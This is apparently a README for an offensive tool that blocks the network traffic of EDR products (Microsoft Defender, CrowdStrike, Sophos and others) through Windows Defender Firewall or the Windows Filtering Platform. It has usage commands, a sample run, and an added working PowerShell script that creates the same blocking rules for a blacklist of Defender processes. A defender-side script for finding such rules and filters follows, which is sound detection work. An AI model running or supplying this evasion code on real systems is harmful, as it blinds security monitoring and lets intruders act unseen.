0xJs/BlockEDRTraffic
Blocking EDRs traffic

Two tools written in C that block network traffic for blacklisted EDR processes, using either Windows Defender Firewall (WDF) or Windows Filtering Platform (WFP).

Overview

  • WindowsDefenderFirewall.exe
    • Creates inbound and outbound block rules in Windows Defender Firewall for blacklisted EDR processes.
  • WindowsFilteringPlatform.exe
    • Creates WFP filters that block traffic for blacklisted EDR processes. Includes a custom AppID resolution routine to obtain executable identities.
  • Both tools:
    • Verify the process is running with High Integrity and SeDebugPrivilege enabled.
    • Enumerate running processes and match them against a blacklist.
    • Support a cleanup mode that removes only the rules/filters created by these PoCs.
  • These tools do not disable or tamper with security products; they create network block rules/filters referencing targeted executables.

How it works (high level)

  • Privilege checks: Ensures elevated integrity level and SeDebugPrivilege to enumerate processes and configure firewall/WFP.
  • Process discovery: Enumerates running processes and resolves full image paths for blacklist matching.
  • Blocking:
    • WDF: Adds per-app inbound/outbound block rules via the Windows Firewall COM API.
    • WFP: Adds per-app IPv4/IPv6 block filters via the WFP engine.
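The WDF path described above, as an added example that is not code from the BlockEDRTraffic project: the same four steps (elevation check, process discovery, per-program inbound and outbound block rules, cleanup of only this script's rules) done with the NetSecurity cmdlets, which write to the same Windows Defender Firewall policy store as the COM API the tool uses. The group name `BlockEDRTraffic-Example`, the script name and the `-Enable`/`-Disable` switches are this example's own; the three image names in `$Blacklist` are the ones the README's sample run matched, and the list is meant to be extended.

```powershell
param([switch]$Enable, [switch]$Disable)

# Added example (not part of the BlockEDRTraffic project). Reproduces the
# README's WDF approach with New-NetFirewallRule / Remove-NetFirewallRule.
# Assumed: the group tag below and the blacklist (taken from the sample run).

$RuleGroup = 'BlockEDRTraffic-Example'                               # assumed tag used for cleanup
$Blacklist = @('MsMpEng.exe', 'NisSrv.exe', 'MpDefenderCoreService.exe')  # from the README's sample run

function Test-IsElevated {
    # Counterpart of the tool's High Integrity check; the firewall cmdlets fail without it.
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    (New-Object Security.Principal.WindowsPrincipal($id)).IsInRole(
        [Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Get-BlacklistedProcess {
    # Process discovery through WMI: ExecutablePath is the DOS path a per-program
    # firewall rule binds to. Protected (PPL) services can come back with an empty
    # path, in which case there is nothing to bind the rule to and the entry is skipped.
    Get-CimInstance Win32_Process |
        Where-Object { $Blacklist -contains $_.Name -and $_.ExecutablePath } |
        Select-Object Name, ProcessId, ExecutablePath |
        Sort-Object ExecutablePath -Unique
}

function Add-EdrBlockRule {
    # One inbound and one outbound Block rule per matched executable, all carrying
    # the group tag so that cleanup can find exactly these rules again.
    foreach ($proc in Get-BlacklistedProcess) {
        foreach ($direction in 'Inbound', 'Outbound') {
            New-NetFirewallRule -DisplayName "$RuleGroup $($proc.Name) $direction" `
                -Group $RuleGroup -Direction $direction -Action Block `
                -Program $proc.ExecutablePath -Profile Any -Enabled True | Out-Null
            "[+] $direction block rule for $($proc.ExecutablePath) (PID $($proc.ProcessId))"
        }
    }
}

function Remove-EdrBlockRule {
    # Only rules in our group are removed; the rest of the firewall policy is untouched.
    $rules = @(Get-NetFirewallRule -Group $RuleGroup -ErrorAction SilentlyContinue)
    $rules | Remove-NetFirewallRule
    "[+] Removed $($rules.Count) rule(s) from group $RuleGroup"
}

if (-not (Test-IsElevated)) { throw 'Run this from an elevated (High Integrity) PowerShell.' }
if ($Enable)      { Add-EdrBlockRule }
elseif ($Disable) { Remove-EdrBlockRule }
else              { 'Usage: .\BlockEdrWdf.ps1 -Enable | -Disable' }
```

Run it elevated as `.\BlockEdrWdf.ps1 -Enable` and undo with `-Disable`. The group tag does the job the tool's own rule naming does: `Get-NetFirewallRule -Group` returns only what this script created, so cleanup cannot remove an administrator's rules. As with the tool, a rule keyed on the executable path stops that image from talking on the network; it does not stop the service, and the README itself notes that end-to-end blocking of telemetry has not been fully validated.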

Supported EDRs

Currently supported EDRs and their processes include:

  • Microsoft Defender Antivirus
  • Microsoft Defender for Endpoint
  • Elastic EDR
  • BitDefender
  • Cortex
  • CrowdStrike
  • Sentinel
  • Sophos

More will be added as I get to test them. The process definitions live in process.c, so extending the blacklist is a matter of adding entries there. I haven't fully validated that telemetry sent towards the SIEM/dashboard is actually blocked, but I did confirm the process names from the installed components.

Usage

  • Compile it using Visual Studio 2022

WindowsDefenderFirewall.exe

  • Use the -e parameter to block all EDR processes
PS C:\ > .\WindowsDefenderFirewall.exe
Usage: WindowsDefenderFirewall.exe -e / -d
Options:
   -e Enable  - Block blacklisted EDR processes
   -d Disable - Remove blocked firewall rules created by this tool
   -h         - Display this help message

WindowsFilteringPlatform.exe

  • Use the --edr parameter to block all EDR processes
  • Use the -e parameter to block a specific process
PS C:\ > .\WindowsFilteringPlatform.exe
Usage: WindowsFilteringPlatform.exe -e / -d  / --edr
Options:
   --edr          - Block traffic of blacklisted EDR processes
   -e <PROCESS>   - Block traffic of specified process
   -d             - Remove blocked firewall rules created by this tool
   -h             - Display this help message

Common scenarios

  • Block all blacklisted EDR processes (WFP):
PS C:\> .\WindowsFilteringPlatform.exe --edr
  • Block a single process (WFP):
PS C:\> .\WindowsFilteringPlatform.exe -e MsMpEng.exe
  • Remove created rules/filters:
PS C:\> .\WindowsFilteringPlatform.exe -d
PS C:\> .\WindowsDefenderFirewall.exe -d

Example

PS C:\ > .\WindowsFilteringPlatform.exe --edr
[i] IsProcessHighIntegrity - Checking if current process is running in High Integrity
        OpenProcessToken - Retrieved handle to token 0x00000000000000AC
        GetTokenInformation1 - Retrieved 28 bytes of token information
        malloc - Allocated 28 bytes of memory at 0x0000026F0B871D60
        GetTokenInformation2 - Retrieved 28 bytes of token information at 0x0000026F0B871D60
        GetSidSubAuthority - Integrity Level: 0x3000
[+] IsProcessHighIntegrity - Process running in High Integrity

[i] BlockEDRTraffic - Blocking traffic of listed processes using Windows Filtering Platform
        GetModuleHandleW - Received handle to ntdll.dll 0x00007FFBCB420000
        GetProcAddress - Received address to NtQuerySystemInformation 0x00007FFBCB582F60
        NtQuerySystemInformation - Retrieved size in bytes for the system information: 292232
        HeapAlloc - Allocated 292232 bytes of memory for SystemProcessInformation at 0x0000026F0B879400
        NtQuerySystemInformation - Retrieved size in bytes of system information: 292232 at 0x0000026F0B879400
        HeapAlloc - Allocated 72 bytes of memory for the EDR process struct at 0x0000026F0B86ECC0
        OpenProcess - Opened handle to process "MpDefenderCoreService.exe" 0x00000000000000AC
        QueryFullProcessImageNameW - Retrieved full process path "\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\MpDefenderCoreService.exe"
        OpenProcess - Opened handle to process "MsMpEng.exe" 0x00000000000000AC
        QueryFullProcessImageNameW - Retrieved full process path "\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\MsMpEng.exe"
        OpenProcess - Opened handle to process "NisSrv.exe" 0x00000000000000AC
        QueryFullProcessImageNameW - Retrieved full process path "\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\NisSrv.exe"
        EnumerateEDRProcesses - 3 EDR processes enumerated
                Matched EDR process: "MpDefenderCoreService.exe" with PID 4288 and full path "\device\harddiskvolume3\programdata\microsoft\windows defender\platform\4.18.25070.5-0\mpdefendercoreservice.exe"
                Matched EDR process: "MsMpEng.exe" with PID 4332 and full path "\device\harddiskvolume3\programdata\microsoft\windows defender\platform\4.18.25070.5-0\msmpeng.exe"
                Matched EDR process: "NisSrv.exe" with PID 9808 and full path "\device\harddiskvolume3\programdata\microsoft\windows defender\platform\4.18.25070.5-0\nissrv.exe"
[i] BlockTraffic - Looping through EDR processes and creating Windows Filtering Platform filters
        FwpmEngineOpen0 - Opened handle to WFP engine 0x0000026F0B87A680
        FwpmProviderCreateEnumHandle0 - Opened handle to WFP enum 0x0000026F0B87A140
        FwpmProviderEnum0 - Enumerated 15 objects
        FindProviderGUIDByDesc - Provider with description "Microsoft Windows WFP Built-in custom provider." found
        FwpmFilterAdd0 - Added IPV4 filter for "MpDefenderCoreService.exe" with ID 77392
        FwpmFilterAdd0 - Added IPV6 filter for "MpDefenderCoreService.exe" with ID 77393
        FwpmEngineOpen0 - Opened handle to WFP engine 0x0000026F0B87A680
        FwpmProviderCreateEnumHandle0 - Opened handle to WFP enum 0x0000026F0B87A230
        FwpmProviderEnum0 - Enumerated 15 objects
        FindProviderGUIDByDesc - Provider with description "Microsoft Windows WFP Built-in custom provider." found
        FwpmFilterAdd0 - Added IPV4 filter for "MsMpEng.exe" with ID 77394
        FwpmFilterAdd0 - Added IPV6 filter for "MsMpEng.exe" with ID 77395
        FwpmEngineOpen0 - Opened handle to WFP engine 0x0000026F0B87A680
        FwpmProviderCreateEnumHandle0 - Opened handle to WFP enum 0x0000026F0B879ED0
        FwpmProviderEnum0 - Enumerated 15 objects
        FindProviderGUIDByDesc - Provider with description "Microsoft Windows WFP Built-in custom provider." found
        FwpmFilterAdd0 - Added IPV4 filter for "NisSrv.exe" with ID 77396
        FwpmFilterAdd0 - Added IPV6 filter for "NisSrv.exe" with ID 77397
[+] BlockEDRTraffic - Windows Filtering Platform blocking filters for all processes have been created
PS C:\ > .\WindowsFilteringPlatform.exe -d
[i] IsProcessHighIntegrity - Checking if current process is running in High Integrity
        OpenProcessToken - Retrieved handle to token 0x00000000000000E0
        GetTokenInformation1 - Retrieved 28 bytes of token information
        malloc - Allocated 28 bytes of memory at 0x00000206BD931BB0
        GetTokenInformation2 - Retrieved 28 bytes of token information at 0x00000206BD931BB0
        GetSidSubAuthority - Integrity Level: 0x3000
[+] IsProcessHighIntegrity - Process running in High Integrity

[i] UnblockTraffic - Removing all Windows Filtering Platform rules with custom filter name "Default Outbound Block"
        FwpmEngineOpen0 - Opened handle to WFP engine 0x00000206BD93A470
        FwpmFilterCreateEnumHandle0 - Opened handle to enumerate filters 0x00000206BD939E90
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77397
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77394
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77393
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77392
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77396
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77395
[+] UnblockTraffic - Windows Filtering Platform filters have been removed
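The sample run above leaves two kinds of artefact on the host: a WDF block rule scoped to an EDR executable (the WindowsDefenderFirewall.exe variant) or a WFP block filter whose `FWPM_CONDITION_ALE_APP_ID` condition names the EDR executable (the run shown here). The following is an added, defender-side check for both and is not code from the BlockEDRTraffic project. It assumes the XML element names that `netsh wfp show filters` emits (`filters/item`, `action/type`, `filterCondition/item/fieldKey`, `conditionValue/byteBlob/data`); verify them against a dump from your own host. The image names in `$EdrImages` are the three from the sample run and the list is meant to be extended; the filter name "Default Outbound Block" is the one the sample run shows and is trivially changed, so the match on the app ID path is the one to rely on.

```powershell
# Added example (not part of the BlockEDRTraffic project): hunt for firewall
# rules and WFP filters that block known EDR executables.
# Assumed: the netsh XML element names below and the image list (sample run).

$EdrImages = @('msmpeng.exe', 'nissrv.exe', 'mpdefendercoreservice.exe')  # lowercase, extend as needed

function Find-EdrFirewallBlockRule {
    # WDF side: every enabled Block rule joined to its application filter.
    Get-NetFirewallRule -Action Block -Enabled True | ForEach-Object {
        $app = $_ | Get-NetFirewallApplicationFilter
        if ($app.Program -and $app.Program -ne 'Any' -and
            $EdrImages -contains ([IO.Path]::GetFileName($app.Program).ToLower())) {
            [pscustomobject]@{ Source = 'WDF'; Name = $_.DisplayName; Group = $_.Group
                               Direction = $_.Direction; Target = $app.Program }
        }
    }
}

function ConvertFrom-WfpHexBlob {
    param([string]$Hex)
    # An ALE_APP_ID blob is the lowercase NT path of the image as NUL-terminated
    # UTF-16LE; netsh dumps it as one hex string, decoded here byte by byte.
    $Hex = $Hex.Trim()
    $bytes = [byte[]]::new([int]($Hex.Length / 2))
    for ($i = 0; $i -lt $bytes.Length; $i++) {
        $bytes[$i] = [Convert]::ToByte($Hex.Substring(2 * $i, 2), 16)
    }
    [Text.Encoding]::Unicode.GetString($bytes).TrimEnd([char]0)
}

function Find-EdrWfpBlockFilter {
    # WFP side: dump the filter table (needs elevation) and walk every Block
    # filter that carries an ALE_APP_ID condition.
    $dump = Join-Path $env:TEMP 'wfpfilters.xml'
    netsh wfp show filters file="$dump" | Out-Null
    [xml]$doc = Get-Content -LiteralPath $dump -Raw
    foreach ($f in $doc.SelectNodes('//filters/item')) {
        if ($f.action.type -ne 'FWP_ACTION_BLOCK') { continue }
        foreach ($c in $f.filterCondition.item) {
            if ($c.fieldKey -ne 'FWPM_CONDITION_ALE_APP_ID') { continue }
            $path = ConvertFrom-WfpHexBlob $c.conditionValue.byteBlob.data
            if ($EdrImages -contains ([IO.Path]::GetFileName($path))) {
                [pscustomobject]@{ Source = 'WFP'; Name = $f.displayData.name; Id = $f.filterId
                                   Layer = $f.layerKey; Provider = $f.providerKey; Target = $path }
            }
        }
    }
    Remove-Item -LiteralPath $dump -ErrorAction SilentlyContinue
}

# Usage (elevated): list both artefact types in one table.
@(Find-EdrFirewallBlockRule) + @(Find-EdrWfpBlockFilter) | Format-Table -AutoSize
```

Run it from an elevated prompt; `netsh wfp show filters` refuses otherwise. A hit from the WFP function reports the filter ID and the layer (the sample run creates one IPv4 and one IPv6 filter per process under the built-in provider), which is what you need to remove it with the tool's `-d` mode or by hand. If the "MPSSVC Rule-Level Policy Change" and "Filtering Platform Policy Change" audit subcategories are enabled, Security events 4946/4948 (firewall rule added/deleted) and 5447 (WFP filter changed) record the same changes at the time they happen; they are off by default, so enable them before relying on them.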

Credits

This project was inspired by, and expands upon, the tools provided in the Evasion Lab (CETP from Altered Security), taught by Saad Ahla.

The EDRSilencer project.

Feature ideas

  • Block a specific executable on disk (Not process)
  • Block all executables in a specific directory
  • Block a specific IP-address or URL (Is wildcard possible?)
  • Block a list of IP-addresses or URLs
  • Remotely apply WFP Filters?
